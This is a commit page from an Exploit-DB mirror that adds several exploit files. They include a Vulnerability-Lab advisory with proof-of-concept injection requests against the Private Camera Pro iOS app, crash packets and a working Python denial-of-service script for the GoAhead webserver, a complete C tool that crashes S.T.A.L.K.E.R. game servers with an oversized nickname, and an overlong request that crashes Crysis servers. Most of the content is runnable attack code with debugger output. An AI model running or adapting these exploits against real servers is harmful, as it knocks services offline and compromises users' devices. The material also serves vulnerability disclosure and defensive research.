bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_28_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-28 04:28:49 +00:00
parent 8333e34e85
commit 0007ea1915
36 changed files with 2115 additions and 551 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1137
files.csv
View file

File diff suppressed because it is too large Load diff

323
platforms/hardware/webapps/31900.txt Executable file
View file

@ -0,0 +1,323 @@
Document Title:
===============
Private Camera Pro v5.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1216
Release Date:
=============
2014-02-24
Vulnerability Laboratory ID (VL-ID):
====================================
1216
Common Vulnerability Scoring System:
====================================
8.1
Product & Service Introduction:
===============================
Private Camera is an iPhone and iPad camera app that could protect your privacy. It supports taking photos and recording videos, password
lock protect, Fake password guest mode, share photos anytime and anywhere. Take photos and videos quick and easily. Support autofocus,
tap to focus, flash light switch, camera switch, brand new UI, easy to use. Support taking still photo and recording video. Switch the
video and photo mode one click. Create, rename, delete album, set album cover. Add photos to Album, remove photos from Album. Multiple photos
can be handled at a time, you can import photos from system camera roll, export photos to system camera roll, add photos to album, remove photos
from album, delete multiple photos. Wi-Fi web access for photos upload, you can upload many photos from computer to iPhone or iPad in one shot.
With iOS 5, Private Camera can sync all your photos and videos on your iCloud account, you can access these photos & videos on all your iOS
devices, use and share these photos & videos anytime, everywhere. Protect photos and videos that you dont want to share. User requires enter
password when access the photos/videos library. Share photos and videos on Twitter, Facebook, Email with your friends.
With Password-lock functionality, can protect your personal photos and videos. Its unique Pseudo-password(decoy-password) guest mode,
can cope with annoying friends from seeing your private photos and videos. With easy to use camera features, let you using iPhone or
iPad take photos & videos and enjoy your photography life!
( Copy of the Homepage: https://itunes.apple.com/us/app/private-camera-photo-vault/id477970594 )
( Copy of the Homepage: https://itunes.apple.com/us/app/private-camera-pro-photo-vault/id473538611 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Private Camera Pro v5.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-02-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Private Camera Pro - iOS Web Application 5.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include vulnerability has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests
or system specific path commands to compromise the web-application/device.
The vulnerability is located in the upload module of the mobile web-application web-interface. Remote attackers can
manipulate the `upload > submit` POST method request with the vulnerable `filename` value to compromise the application
or connected device components. The issue allows remote attackers to include local app path values or wifi web-server files.
The exploitation appears on the application-side and the inject request method is POST. The exection occurs in the main index
file dir list. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability
scoring system) count of 7.2(+)|(-)7.3.
Exploitation of the local file include vulnerability requires no user interaction or privileged mobile application user account.
Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise
or web-server compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Upload (UI) & Import (Device Sync)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] File Dir Index Listing
1.2
A local command/path injection web vulnerabilities has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application.
A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `[devicename] (srvName)` value of the device-info module. Local attackers are able to inject own malicious
system specific commands or path value requests as the physical iOS hardware devicename. The execution of the injected command or path request occurs with
persistent attack vector in the device-info listing module of the web interface. The security risk of the local command/path inject vulnerability is estimated
as high(-) with a cvss (common vulnerability scoring system) count of 6.5(+)|(-)6.6.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Content > header-title
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
1.3
A persistent input validation vulnerability has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application.
A persistent input validation vulnerability allows remote attackers to inject own malicious script codes on the application-side
of the affected application web-server.
The vulnerability is located in the add `New Album` input field. The vulnerability allows remote attackers to inject
own malicious script codes on the application-side of the index path/folder listing. The script code execute occurs
in the index `Albums Index` listing with the vulnerable album_title parameter. The inject can be done local by the device
via add album sync function or remote by an inject via upload in the web-interface. The attack vector is persistent and
the injection request method is POST. The security risk of the persistent input validation web vulnerability in the
albumtitle value is estimated as high(-) with a cvss (common vulnerability scoring system) count of 4.2(+)|(-)4.3.
Exploitation of the persistent script code inject vulnerability via POST method request requires low user interaction
and no privileged web-interface user account. Only the sync add album sync function of the reproduce via device requires
physical access.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Albums Add (UI) & Import (Snyc Device)
Vulnerable Module(s):
[+] album_title
Affected Module(s):
[+] Album Index & Sub Category Index
Proof of Concept (PoC):
=======================
1.1
the local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or
user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Albums
<div class="btn btn-mini directDownload" title="Download photo">Download</div></div></li><li class="span2 thumbnail_warp">
<div class="thumbnail_image"><a href="http://192.168.2.109/origins/PC_20140223160359211.jpg" class="thumbnail" w="480" h="320"
t="0" u="PC_20140223160359211.jpg"><img style="display: block;" src="Default%20Album_filename-Dateien/PC_20140223160359211.jpg"
data-original="/photos/thumbnails/PC_20140223160359211.jpg" class="photo_image"><div class="inner_icons"> </div></a>
<div class="thumbnail_overlay"><img style="display: none;" src="Default%20Album_filename-Dateien/zoomout_icon.png"
class="zoomout_icon" title="origin photo"></div></div><div style="display: none;" class="photo-edit-bar"><label class="checkbox inline">15<input
id="15" name="0" value="./[LOCAL FILE INCLUDE VULNERABILITY!].jpg" type="checkbox"></label><div class="btn btn-mini directDownload"
title="Download photo">Download</div></div></li></ul></div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/asset/addAsset Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[462] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Content-Length[24791]
Content-Type[multipart/form-data; boundary=---------------------------27557158176485]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------27557158176485
Content-Disposition: form-data; name="params"
name:Default%20Album|url:82A29591-4E94-4313-B4A6-B527A1A551AE|id:SYS_ALBUM_DEFAULT
-----------------------------27557158176485
Content-Disposition: form-data; name="files[]"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/jpeg
1.2
The local command inject web vulnerability can be exploited by remote attackers with physical device access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Device Info > device_info_list > srvname > device-info > [devicename] (srvName)
<div aria-hidden="false" style="display: block;" id="modal_serverInfo" class="modal hide fade in">
<div class="modal-header">
<a class="close" data-dismiss="modal">×</a>
<h4>Device info</h4>
</div>
<div class="modal-body">
<ul class="device_info_list">
<li>Name:<span id="srvName" class="device-info">bkm337¥"><%20"./[LOCAL COMMAND INJECT VULNERABILITY!]"><if></span></li>
<li>Model:<span id="srvModel" class="device-info">iPad 4 (WiFi)</span></li>
<li>iOS Version:<span id="srvVer" class="device-info">7.0.6</span></li>
<li>Free Space:<span id="srvFree" class="device-info">9.993 GB</span></li>
<li>Support Video:<span id="srvSupported" class="device-info">MOV, M4V, MP4</span></li>
</ul>
</div>
<div class="modal-footer">
<a href="#" class="btn" data-dismiss="modal">Close</a>
</div>
</div>
Note: Inject your payload as iOS devicename (phone or ipad). The execution occurs in the device-info section of the web-interface.
1.2
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and
low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: File Dir Index > album_title
<div class="span12 content-body index_page" id="indexDropbox"><ul class="thumbnails" id="albums"><li class="album_warp">
<a href="#" n="Default%20Album" u="SYS_ALBUM_DEFAULT" albumtype="1" editable="true" class="thumbnail thumbnailAlbum">
<img src="Albums_foldername-Dateien/SYS_ALBUM_DEFAULT.jpg" class="album_image"><h5 class="album_title">Default Album</h5>
<p class="album_desc 1">15 Photos</p></a></li><li class="album_warp"><a href="#" n="%20">[PERSISTENT INJECTED SCRIPT CODE!]"
u="E2569E17-2254-46D9-992C-82833B92F535" albumtype="0" editable="true" class="thumbnail thumbnailAlbum">
<img src="Albums_foldername-Dateien/E2569E17-2254-46D9-992C-82833B92F535.jpg" class="album_image">
<h5 class="album_title">><%20">[PERSISTENT INJECTED SCRIPT CODE!]"> "><%20">[PERSISTENT INJECTED SCRIPT CODE!]></h5>
<p class="album_desc 0">7 Photos</p></a></li></iframe></h5></a></li></ul></div>
Note: Use the sync function when processing to import to inject the persistent code to the file dir index of the web-interface.
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and validation of the filename value in the upload file POst method request.
1.2
The local command inject web vulnerability can be fixed by a secure encode of the vulnerable devicename value in the service information module.
1.3
The persistent input validation web vulnerability can be patched by a secure parse and encode of the vulnerable albumname value.
Restrict the albumname add and rename function to prevent further persistent script code injects via POST method request.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
The security risk of the local command inject web vulnerability is estimated as high(-).
1.3
The security risk of the persistent input validation web vulnerability is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

148
platforms/linux/dos/31761.txt Executable file
View file

@ -0,0 +1,148 @@
# Title: Embedthis Goahead Webserver multiple DoS vulnerabilities.
# Author: 0in (Maksymilian Motyl)
# Date: 18.02.2014
# Version: 3.1.3-0
# Software Link: http://embedthis.com/products/goahead/
# Download: https://github.com/embedthis/goahead
# Tested on: Linux x32
# Description:
# "GoAhead is embedded in hundreds of millions of devices and applications like: printers, routers, switches, IP phones, mobile applications, data acquisition,
# military applications and WIFI gateways."
# .... Ok.
# But I cannot confirm any vulnerability in products listed at http://embedthis.com/products/goahead/users.html
-----------------------------------------------
1st vulnerability
***************************************
#!/usr/bin/python
packet="GET /cgi-bin/test/a/c/?"+"#"*1024+".cgi/c.txt HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"User-Agent: BillyExploiter\r\n"\
"Accept: text/html\r\n"\
"Accept-Language: pl\r\n"\
"Accept-Encoding: gzip, deflate\r\n"\
"Connection: keep-alive"
***************************************
Program received signal SIGABRT, Aborted.
0xb7772424 in __kernel_vsyscall ()
(gdb) bt
#0 0xb7772424 in __kernel_vsyscall ()
#1 0xb757d941 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2 0xb7580d72 in *__GI_abort () at abort.c:92
#3 0xb75b9e15 in __libc_message (do_abort=2,
fmt=0xb7691e70 "*** glibc detected *** %s: %s: 0x%s ***\n")
at ../sysdeps/unix/sysv/linux/libc_fatal.c:189
#4 0xb75c3f01 in malloc_printerr (action=<optimized out>,
str=0x6 <Address 0x6 out of bounds>, ptr=0xb7765dad) at malloc.c:6283
#5 0xb75c517e in munmap_chunk (p=<optimized out>) at malloc.c:3540
#6 0xb7752d74 in termWebs (wp=wp@entry=0x8573240, reuse=reuse@entry=1)
at src/http.c:457
#7 0xb775309c in reuseConn (wp=0x8573240) at src/http.c:520
#8 complete (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:575
#9 0xb7754571 in websPump (wp=wp@entry=0x8573240) at src/http.c:837
#10 0xb7755606 in readEvent (wp=0x8573240) at src/http.c:797
#11 socketEvent (wptr=0x8573240, mask=2, sid=<optimized out>) at src/http.c:735
*** glibc detected *** goahead: munmap_chunk(): invalid pointer: 0xb7765dad ***
(gdb) x/xw 0xb7765dad
0xb7765dad: 0x74746800 # "tth"
-----------------------------------------------
2nd vulnerability
***************************************
#!/usr/bin/python
packet="GET http:// HTTP/1.1\r\n"
# Same crash happens when:
packet="GET http://dupa: HTTP/1.1\r\n"
***************************************
Program received signal SIGSEGV, Segmentation fault.
websDecodeUrl (decoded=decoded@entry=0xb7756253 "/",
input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
at src/http.c:2225
warning: Source file is more recent than executable.
2225 *op = *ip;
(gdb) bt
#0 websDecodeUrl (decoded=decoded@entry=0xb7756253 "/",
input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
at src/http.c:2225
#1 0xb774248f in websUrlParse (url=0x83bf140 "http", url@entry=0x83cd58c "http://",
pbuf=pbuf@entry=0xbfe6ce14, pprotocol=pprotocol@entry=0x0,
phost=phost@entry=0xbfe6ce00, pport=pport@entry=0xbfe6ce0c,
ppath=ppath@entry=0xbfe6ce08, pext=pext@entry=0xbfe6ce10,
preference=preference@entry=0x0, pquery=pquery@entry=0xbfe6ce04)
at src/http.c:3122
#2 0xb7745079 in parseFirstLine (wp=0x83bf240) at src/http.c:949
#3 parseIncoming (wp=0x83bf240) at src/http.c:870
(gdb) disas $eip
0xb773fb28 <+72>: cmp $0x25,%dl
0xb773fb2b <+75>: je 0xb773fb70 <websDecodeUrl+144>
=> 0xb773fb2d <+77>: mov %dl,(%esi)
(gdb) info reg
eax 0x1 1
ecx 0x13 19
edx 0x2f 47
ebx 0xb775e91c -1217009380
esp 0xbfe6cd20 0xbfe6cd20
ebp 0xb7756254 0xb7756254
esi 0xb7756253 -1217043885
edi 0xb7756253 -1217043885
eip 0xb773fb2d 0xb773fb2d <websDecodeUrl+77>
(gdb) x/xw 0xb7756253
0xb7756253: 0x7473002f
-----------------------------------------------
3rd vulnerability
***************************************
#!/usr/bin/python
packet="GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"Accept: text/html\r\n"\
"Accept-Language: pl\r\n"\
"Accept-Encoding: gzip, deflate\r\n"\
"Connection: keep-alive\r\n"
"Authorization: Basic #\r\n"
***************************************
(gdb) bt
#0 strchr () at ../sysdeps/i386/strchr.S:127
#1 0xb770652a in parseBasicDetails (wp=0x8055240) at src/auth.c:717
#2 0xb7706c31 in websAuthenticate (wp=wp@entry=0x8055240) at src/auth.c:110
#3 0xb7717532 in websRouteRequest (wp=wp@entry=0x8055240) at src/route.c:85
(gdb) disas $eip
0xb758799a <+90>: lea 0x0(%esi),%esi
0xb75879a0 <+96>: add $0x10,%eax
=> 0xb75879a3 <+99>: mov (%eax),%ecx
(gdb) info reg
eax 0x0 0
ecx 0x3a3a 14906
edx 0x3a3a3a3a 976894522
ebx 0xb772a91c -1217222372
esp 0xbfc71428 0xbfc71428
ebp 0x8055240 0x8055240
esi 0x8055240 134566464
edi 0x0 0
eip 0xb75879a3 0xb75879a3 <strchr+99>

49
platforms/linux/dos/31915.py Executable file
View file

@ -0,0 +1,49 @@
#!/usr/bin/python
'''
GoAhead Web Server version prior to 3.1.3 is vulnerable to DoS. A fix exists for version 3.2.
The Web Server crashes completely once this requests is received. The vulnerability doesn't seem to be exploitable on Linux versions ... could be wrong :) !
Official Issue Post:
https://github.com/embedthis/goahead/issues/77
(gdb) bt
#0 0x00007ffff7a50425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1 0x00007ffff7a53b8b in __GI_abort () at abort.c:91
#2 0x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201
#3 0x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:5039
#4 0x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=<optimized out>) at src/http.c:457
#5 0x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520
#6 complete (wp=0x40cfc0, reuse=1) at src/http.c:575
#7 0x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837
#8 0x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797
#9 socketEvent (wptr=0x40cfc0, mask=2, sid=<optimized out>) at src/http.c:735
#10 socketEvent (sid=<optimized out>, mask=2, wptr=0x40cfc0) at src/http.c:723
#11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=<optimized out>) at src/http.c:714
#12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327
#13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639
#14 socketProcess () at src/socket.c:623
#15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290
#16 0x00000000004012ee in main (argc=<optimized out>, argv=0x7fffffffdfd8, envp=<optimized out>) at src/goahead.c:146
'''
import socket
import os
import sys
import struct
HOST = sys.argv[1]
PORT = int(sys.argv[2])
crash = '?'*1 + 'A' * 1000
payload = 'GET ' + crash + ' HTTP/1.1\r\n'
payload += 'Host: ' + HOST + ':' + str(PORT) + '\r\n\r\n'
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((HOST,PORT))
expl.send(payload)
data = expl.recv(1024)
print data
expl.close()

351
platforms/multiple/dos/31919.c Executable file
View file

@ -0,0 +1,351 @@
source: http://www.securityfocus.com/bid/29723/info
S.T.A.L.K.E.R. game servers are prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define BUFFSZ 1472
#define PORT 5445
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int putcc(u8 *dst, int chr, int len);
int putws(u8 *dst, u8 *src);
int fgetz(FILE *fd, u8 *data, int size);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
u32 res,
seed;
int sd,
i,
len,
pwdlen,
nicklen,
pck;
u16 port = PORT;
u8 buff[BUFFSZ],
nick[300], // major than 64
pwd[64] = "",
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"S.T.A.L.K.E.R. <= 1.0006 Denial of Service "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
seed = time(NULL);
do {
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
seed = (seed * 0x343FD) + 0x269EC3;
for(pck = 0; pck <= 4; pck++) {
p = buff;
switch(pck) {
case 0: {
*p++ = 0x88;
*p++ = 0x01;
*p++ = 0x00;
*p++ = 0x00;
p += putxx(p, 0x00010006, 32); // not verified
p += putxx(p, seed, 32);
p += putxx(p, seed, 32); // should be a different number
break;
}
case 1: {
*p++ = 0x80;
*p++ = 0x02;
*p++ = 0x01;
*p++ = 0x00;
p += putxx(p, 0x00010006, 32); // not verified
p += putxx(p, seed, 32);
p += putxx(p, seed, 32); // should be a different number
break;
}
case 2: {
*p++ = 0x3f;
*p++ = 0x02;
*p++ = 0x00;
*p++ = 0x00;
p += putxx(p, seed, 32);
break;
}
case 3: {
memset(nick, &#039;A&#039;, sizeof(nick));
nick[sizeof(nick) - 1] = 0;
*p++ = 0x7f;
*p++ = 0x00;
*p++ = 0x01;
*p++ = 0x00;
p += putxx(p, 0x000000c1, 32);
p += putxx(p, 0x00000002, 32);
p += putxx(p, 0x00000007, 32);
p += putcc(p, 0, 0x50);// hash at 0x48 set to zeroes
pwdlen = putws(p, pwd); p += pwdlen;
p += putcc(p, 0, 4); // don&#039;t know
strncpy(p, nick, 0x80); p += 0x80;
p += putxx(p, 1, 32);
nicklen = putws(p, nick); p += nicklen;
putxx(buff + 0x10, 0xe0 + pwdlen, 32);
putxx(buff + 0x14, nicklen, 32);
putxx(buff + 0x18, 0x58 + pwdlen, 32);
if(pwd[0]) putxx(buff + 0x20, 0x58, 32);
putxx(buff + 0x24, pwdlen, 32);
break;
}
case 4: {
*p++ = 0x7f;
*p++ = 0x00;
*p++ = 0x02;
*p++ = 0x02;
p += putxx(p, 0x000000c3, 32);
break;
}
default: break;
}
len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);
if(pck == 3) {
while(buff[0] != 0x7f) {
len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 1);
}
getxx(buff + 8, &res, 32);
if(res == 0x80158410) {
printf("\n- server is protected by password, insert it: ");
fgetz(stdin, pwd, sizeof(pwd));
break;
} else if(res == 0x80158610) {
printf("\n server full ");
for(i = 5; i; i--) {
printf("%d\b", i);
sleep(ONESEC);
}
break;
} else if(res == 0x80158260) {
printf("\nError: your IP is banned\n");
exit(1);
} else if(res) {
printf("\nError: unknown error number (0x%08x)\n", res);
//exit(1);
}
}
}
close(sd);
} while(pck <= 4);
printf("\n- done\n");
return(0);
}
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
int retry = 2,
len;
if(in) {
while(retry--) {
fputc(&#039;.&#039;, stdout);
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
< 0) goto quit;
if(!out) return(0);
if(!timeout(sd, 1)) break;
}
} else {
if(timeout(sd, 3) < 0) retry = -1;
}
if(retry < 0) {
if(!err) return(-1);
printf("\nError: socket timeout, no reply received\n\n");
exit(1);
}
fputc(&#039;.&#039;, stdout);
len = recvfrom(sd, out, outsz, 0, NULL, NULL);
if(len < 0) goto quit;
return(len);
quit:
if(err) std_err();
return(-1);
}
int putcc(u8 *dst, int chr, int len) {
memset(dst, chr, len);
return(len);
}
int putws(u8 *dst, u8 *src) {
u8 *d,
*s;
if(!src[0]) return(0); // as required by stalker
for(s = src, d = dst; ; s++) {
*d++ = *s;
*d++ = 0;
if(!*s) break;
}
return(d - dst);
}
int fgetz(FILE *fd, u8 *data, int size) {
u8 *p;
if(!fgets(data, size, fd)) return(-1);
for(p = data; *p && (*p != &#039;\n&#039;) && (*p != &#039;\r&#039;); p++);
*p = 0;
return(p - data);
}
int getxx(u8 *data, u32 *ret, int bits) {
u32 num;
int i,
bytes;
bytes = bits >> 3;
for(num = i = 0; i < bytes; i++) {
num |= (data[i] << (i << 3));
}
*ret = num;
return(bytes);
}
int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}
u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

12
platforms/multiple/dos/31931.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29759/info
Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.
Crysis 1.21 is vulnerable; other versions may also be affected.
GET / HTTP/1.0
Content-Length: 0
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa